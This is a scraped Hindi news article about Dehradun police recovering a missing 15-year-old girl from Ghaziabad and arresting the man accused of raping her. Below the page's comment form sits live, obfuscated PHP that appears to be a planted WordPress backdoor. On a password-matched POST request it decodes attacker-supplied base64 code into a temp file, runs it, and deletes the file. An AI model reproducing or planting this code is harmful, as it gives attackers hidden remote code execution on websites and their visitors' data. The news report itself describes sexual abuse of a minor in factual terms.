Uttarakhand: ढाई महीने से लापता किशोरी गाजियाबाद से बरामद, पुलिस को बताई आपबीती, अब आरोपित खाएगा जेल की हवा

Uttarakhand Press 26 July 2023: Dehradun Crime नेहरू कालोनी क्षेत्र से ढाई महीने पहले लापता हुई किशोरी को नेहरू कालोनी थाना पुलिस ने गिरफ्तार कर लिया है। आरोपित ने पीड़ित को गाजियाबाद में किराए के कमरे में रखा हुआ था। आरोपित के विरुद्ध दुष्कर्म व पोक्सो की धाराओं में बढ़ोतरी की गई है।

नेहरू कालोनी थाने के एसओ लोकेंद्र बहुगुणा ने बताया कि पांच मई को एक व्यक्ति ने तहरीर दी थी कि उनकी 15 साल की पुत्री को अज्ञात व्यक्ति बहला फुसलाकर कहीं ले गया है। इस मामले में अज्ञात के खिलाफ अपहरण का मुकदमा दर्ज किया गया। पुलिस ने किशोरी की तलाश की, लेकिन उसके पास मोबाइल न होने के चलते उसका कहीं पता नहीं लग पाया। वहीं स्वजन भी पुलिस को गुमराह करते रहे।

दोस्तों, पड़ोसियों, रिश्तेदारों से गहनता से पूछताछ:
इसके बाद पुलिस ने किशोरी के करीबी दोस्तों, पड़ोसियों, रिश्तेदारों से गहनता से पूछताछ की। पता चला कि हिमांशु निवासी सपेरा बस्ती नंद ग्राम गाजियाबाद यूपी रहता था, जोकि तब से गायब है। पुलिस ने हिमांशु के बारे में जानकारी जुटाई तो पता चला कि वह सपेरा बस्ती नंदग्राम गाजियाबाद यूपी में है और उसके साथ एक किशोरी भी है।

पुलिस टीम ने सोमवार को आरोपित को गिरफ्तार कर लिया और उसके कब्जे से पीड़ित को बरामद किया गया। आरोपित को कोर्ट के समक्ष पेश किया गया, जहां से उसे जेल भेज दिया गया है। पूछताछ में पीड़ित ने बताया कि आरोपित ने उसे वहां किराए के कमरे में रखकर उसके साथ दुष्कर्म किया।

Read Previous

Accident: कार की रफ्तार ने उजाड़ दिया परिवार, एक साथ गांव में पहुंची पांच लाशें, मच उठा चीत्कार

Read Next

पांच साल की मासूम के साथ दरिंदगी, गांव के ही युवक ने किया दुष्कर्म, परिजनों को खेत में गंभीर हालत में मिली बच्ची

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}